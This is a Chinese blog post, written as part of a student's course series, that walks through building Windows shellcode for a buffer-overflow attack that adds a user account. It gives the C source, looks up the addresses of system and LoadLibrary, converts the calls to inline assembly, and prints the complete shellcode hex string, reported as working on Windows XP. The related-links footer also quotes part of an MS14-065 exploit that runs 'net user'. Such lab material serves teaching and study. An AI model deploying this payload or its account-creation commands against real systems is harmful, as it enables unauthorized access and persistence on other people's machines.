缓冲区溢出攻击(二)添加用户

最新推荐文章于 2024-11-14 19:20:24 发布
最新推荐文章于 2024-11-14 19:20:24 发布
阅读量530 收藏 3
点赞数 2
文章标签: 反汇编 c++ 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Dusk_Rain/article/details/105362235
版权

我们接着(一)继续实现

Shell code编写

#include <windows.h>
int main()
{
       LoadLibrary("msvcrt.dll");
       system("net user y /add");
       return 0;
}

上诉代码可以实现再windows里添加一名标准用户“y"

但是要将上面的语句改为汇编语言,就必须先找到
system, LoadLibrary
的地址


#include <windows.h>   
#include <stdio.h>   
typedef void (*MYPROC)(LPTSTR);   
int main()   
{      
        HINSTANCE LibHandle;   
        MYPROC ProcAdd;   
        LibHandle = LoadLibrary("msvcrt");   
        printf("msvcrt LibHandle = //x%x\n", LibHandle);   
        ProcAdd=(MYPROC)GetProcAddress(LibHandle,"system");    
        printf("system = //x%x\n", ProcAdd);   
   
        LibHandle = LoadLibrary("kernel32");   
        printf("kernel32 LibHandle = //x%x\n", LibHandle);   
        ProcAdd=(MYPROC)GetProcAddress(LibHandle,"LoadLibraryA");      
        printf("LoadLibrary = //x%x\n", ProcAdd);   
        return 0;   
}

运行后找到对应的地址
在这里插入图片描述

汇编语言

LoadLibrary(“msvcrt.dll”)

_asm   
    {   
        //   LoadLibrary("msvcrt.dll");   
            push ebp   
            mov ebp,esp   
            xor eax,eax   
            push eax   
            push eax   
            push eax   
            mov byte ptr[ebp-0Ch],4Dh   
            mov byte ptr[ebp-0Bh],53h   
            mov byte ptr[ebp-0Ah],56h   
            mov byte ptr[ebp-09h],43h   
            mov byte ptr[ebp-08h],52h   
            mov byte ptr[ebp-07h],54h   
            mov byte ptr[ebp-06h],2Eh   
            mov byte ptr[ebp-05h],44h   
            mov byte ptr[ebp-04h],4Ch   
            mov byte ptr[ebp-03h],4Ch   
            lea eax,[ebp-0Ch]   
            push eax   
            mov edx,0x7620de15 //LoadLibrary  
            call edx
            }

system(“net user y /add”);

_asm   
    {   
mov esp,ebp ;        把ebp的内容赋值给esp
push ebp ;             保存ebp,esp则减4
mov ebp,esp ;        给ebp赋新值,将作为局部变量的基指针
xor edi,edi ;
push edi ;  压入0,esp-4,作用是构造字符串的结尾\0字符
push edi
push edi
push edi ;   加上上面,一共有16个字节,用来放“net user c /add” 
mov byte ptr [ebp-0Fh],6eh ;n
mov byte ptr [ebp-0eh],65h ;e 
mov byte ptr [ebp-0dh],74h ;t
mov byte ptr [ebp-0ch],20h ;
mov byte ptr [ebp-0bh],75h ;u
mov byte ptr [ebp-0ah],73h ;s
mov byte ptr [ebp-09h],65h ;e
mov byte ptr [ebp-08h],72h ;r
mov byte ptr [ebp-07h],20h ;
mov byte ptr [ebp-06h],79h ;y
mov byte ptr [ebp-05h],20h ;
mov byte ptr [ebp-04h],2Fh ;/
mov byte ptr [ebp-03h],61h ;a
mov byte ptr [ebp-02h],64h ;d
mov byte ptr [ebp-01h],0h ;0
lea eax,[ebp-0fh] ;
push eax ;
mov eax, 0x7723b177 ;                   system函数地址
call eax ;                              调用system
	}

我们采取(一)中同样的办法
设置断点
alt+8找到对应地址
在这里插入图片描述
在这里插入图片描述
alt+6
在这里插入图片描述
在处理后我们得到了
shellcode=\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\x8D\x45\xF4\x50\xBA\x15\xDE\xFA\x76\xFF\xD2\x8B\xE5\x55\x8B\xEC\x33\xFF\x57\x57\x57\x57\xC6\x45\xF1\x6E\xC6\x45\xF2\x65\xC6\x45\xF3\x74\xC6\x45\xF4\x20\xC6\x45\xF5\x75\xC6\x45\xF6\x73\xC6\x45\xF7\x65\xC6\x45\xF8\x72\xC6\x45\xF9\x20\xC6\x45\xFA\x79\xC6\x45\xFB\x20\xC6\x45\xFC\x2F\xC6\x45\xFD\x61\xC6\x45\xFE\x64\xC6\x45\xFF\x00\x8D\x45\xF1\x50\xB8\x77\xB1\x23\x77\xFF\xD0

溢出

当我想在(一)的基础上直接运行出现了错误,在询问了同学后,被告知可以在dev成功运行
(还有人是通过删除几个/x41(a)后获得了成功)
这边是在xp上实现了的(如果明天课上能弄清楚道理,再回来更新)
在这里插入图片描述
在这里插入图片描述

参考书目

Q版缓冲区溢出教程

泠珩
关注
C/C++ 基础栈溢出及保护机制
编程与实战的博客
12-01 3134
来源:pandolia 整理:CPP开发者https://www.jianshu.com/p/47d484b9227e【导读】:缓冲区溢出非常危险,因为栈空间内保存了函数的返回地址。...
一个shellcode作用是添加Windows用户
05-06
一个shellcode,作用是添加Windows用户(同时包含shellcode和相应的汇编代码,绝对实用)
权限提升 - Win 溢出漏洞及 AT&SC&PS 提权解析
最新发布
m0_57836225的博客
11-14 770
Win 溢出漏洞Windows 操作系统由于其广泛的应用和复杂的代码结构,可能存在一些溢出漏洞。这些漏洞通常是由于程序在处理数据时没有正确地验证输入数据的长度或边界,导致数据溢出到相邻的内存区域。当攻击者能够利用这些漏洞时,可能会破坏系统的正常运行,甚至获取更高的权限。例如,缓冲区溢出漏洞可能允许攻击者在目标系统上执行恶意代码。AT&SC&PS 提权AT 命令在 Windows 中曾用于计划任务,攻击者可能利用 AT 命令的一些特性或漏洞来提升权限。
溢出提升权限攻击解决办法()
congjukun0600的博客
08-12 251
溢出提升权限攻击解决办法()[@more@]  在骇客频频攻击、在系统漏洞层出不穷的今天,作为网络管理员、系统管理员的我们虽然在服务器的安全上都下了不少功夫:诸如,及时的打上系统安全补丁、进行一些常规的安全配置,但是仍然不...
Windows权限提升—溢出提权
剁椒鱼头没剁椒的博客
03-16 3211
这里需要我们了解的权限提升大概分为:后台权限,网站权限,数据本权限。接口权限,系统权限。域控权限等。此提权方法是利用系统本身存在的一些系统内核溢出漏洞,但未曾打相应的补丁,攻击者通过对比systeminfo信息中的补丁信息来查找缺失的补丁号,通过缺失补丁号对照相应的系统版本查找对应可以提权提升的exp。不过这里需要注意,只要对应的补丁号加上对应的系统的版本的提权exp才可以成功,有时候如果查找到提权exp提权不成功,那么就可以查看是不是系统版本没对应上,且不排除一些提权漏洞利用需要相应的环境。
hack--溢出攻击
wydbyxr的博客
11-27 883
溢出攻击   缓冲区溢出是指当计算机向缓冲区内填充数据位数时超过了缓冲区本身的容量溢出的数据覆盖在合法数据上。   理想的情况是 程序检查数据长度并不允许输入超过缓冲区长度的字符,但是绝大多数程序都会假设数据长度总是与所分配的储存空间相匹配,这就为缓冲区溢出埋下隐患。   操作系统所使用的缓冲区,又被称为&quot;堆栈&quot;。在各个操作进程之间,指令会被临时储存在&quot;堆栈&quot;当中,&quot;堆栈&quot;也会出现缓冲区溢出。缓
计算机系统基础之缓冲区溢出攻击实验
04-14
### 缓冲区溢出攻击实验知识点解析 #### 实验背景 缓冲区溢出是一种常见的安全漏洞,通过向固定长度的缓冲区写入超出其容量的数据来触发。这种攻击能够导致程序崩溃,甚至允许攻击者执行任意代码。《计算机系统基础...
防范缓冲区溢出攻击的方法
SXXYNHHXX的博客
07-21 1227
当程序向缓冲区写入数据时,如果输入的数据量超过了缓冲区的容量,多余的数据会覆盖相邻的内存区域。缓冲区溢出攻击是计算机安全领域的一种常见攻击方式,它利用了程序中的缓冲区溢出漏洞。缓冲区溢出是指当一个程序向缓冲区写入数据时,如果输入的数据量超过了缓冲区的容量,多余的数据会溢出到相邻的内存区域。例如,GCC编译器提供的`-fstack-protector`选项可以在函数的堆栈帧中添加一个保护区域,用于检测缓冲区溢出攻击。通过综合运用这些技术和方法,可以提高系统的安全性,减少缓冲区溢出攻击的风险。
实验五缓冲区溢出攻击与防范实验报告.doc
01-15
### 缓冲区溢出攻击与防范实验报告 #### 实验背景与目的 随着信息技术的飞速发展,网络安全成为了一个不容忽视的重要课题。其中,缓冲区溢出是一种常见的安全漏洞,它可能导致各种严重后果,包括但不限于系统崩溃...
缓冲区溢出攻击原理实例
08-17
**缓冲区溢出攻击原理与实例** 缓冲区溢出攻击是一种常见的网络安全威胁,它利用了程序处理内存时的疏忽,尤其是当程序没有正确检查输入数据的大小时。这种攻击通常发生在程序尝试将数据写入固定大小的内存区域(即...
seed缓冲区溢出实验报告1
08-03
ASLR是一种防止缓冲区溢出攻击的安全机制,它通过随机化程序的内存布局来增加攻击者预测内存地址的难度。关闭ASLR后,实验者可以通过填充缓冲区并覆盖返回地址来控制程序执行流。 在任务1中,实验者使用C语言编写了...
添加用户
03-01
在linux添加用户添加密钥,添加密钥添加密钥
溢出攻击技术
03-13
缓冲区溢出攻击技术-栈溢出攻击技术。网络安全相关。
弹出DOS窗口的缓冲区溢出shellcode源代码及可执行文件
05-06
弹出DOS窗口的缓冲区溢出shellcode源代码及可执行文件,有两个不同的程序代码
MS14-065 添加用户并提升至管理员 EXP
CC's Blog
11-14 3703
MS14-065,添加用户并提升到管理员,IE only function runmumaa() On Error Resume Next set shell=createobject("Shell.Application") shell.ShellExecute "net.exe","user test test /ad" shell.ShellExecute "net.exe","loc
缓冲区溢出攻击
幸福在路上
03-31 1123
作者:Tang Zhemingstrcpy 是C语言中最常用的函数之一,今天我们将要看到的就是如何利用strcpy的错误而导致的一次匪夷所思的函数调用。实验例子如下:void copyString(char* s) { char buf[10]; strcpy(buf, s); }作为一个合格的C语言程序员,当然不应该出现这样的代码,因为这样的函数可能会导致数据溢出,但是很遗憾在现实
war-ftpd 1.65 缓冲区溢出漏洞实验
LutingWang的博客
05-09 1886
本文利用 War-ftpd 1.65 的缓冲区漏洞,为 Windows XP 新建一个管理员账户。实验前需要安装 Windows XP 虚拟机和 Python 2.7 。 相关软件安装 新建一个文件夹放 ward169 ,双击打开。之所以要新建一个文件夹,是因为这个应用程序会在他所在的目录生成一堆文件,像下面这样 其中有一个 war-ftpd 就是我们要的,也就是带有缓冲区漏洞的程序。这个 war-ftpd 原本是一个 ftp 服务器的守护进程,打开大概是这个样子 但是这个时候 ftp 服务器还没有开启
c++堆栈溢出怎么解决_栈溢出基础
weixin_39610422的博客
11-23 3443
一. 基础知识什么是缓冲区溢出在深入探讨技术之前, 让我们先了解一下缓冲区溢出的实际内容.想象一个非常简单的程序, 要求你输入你的用户名, 然后返回到它在做什么.从视觉上看, 如下所示注意到括号之间的空格是输入用户名的预期空间.那个空间是我们的缓冲.处理用户名后, 返回地址将告知程序需要执行的下一个指令.现在, 如果我们不仅输入用户名, 而且添加其他数据以溢出缓冲区空间, 会发生什么情况?不仅如...
实验8 缓冲区溢出攻击实验
热门推荐
leapme的专栏
03-17 1万+
实验8 缓冲区溢出攻击实验缓冲区溢出是目前最常见的一种安全问题,操作系统以及应用程序大都存在缓冲区溢出漏洞。缓冲区是一段连续内存空间,具有固定的长度。缓冲区溢出是由编程错误引起的,当程序向缓冲区内写入的数据超过了缓冲区的容量,就发生了缓冲区溢出缓冲区之外的内存单元被程序“非法”修改。一般情况下,缓冲区溢出导致应用程序的错误或者运行中止,但是,攻击者利用程序中的漏洞,精心设计出一段入侵程序
Windows Vista抵御缓冲区溢出攻击技术解析
"这篇论文详细探讨了Windows Vista操作系统如何应对缓冲区溢出攻击的问题,重点关注了四种关键防御技术,即地址空间配置随机化(ASLR)、数据执行保护(DEP)、GS栈保护和安全结构化异常处理(SEH)。作者们通过分析缓冲区...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值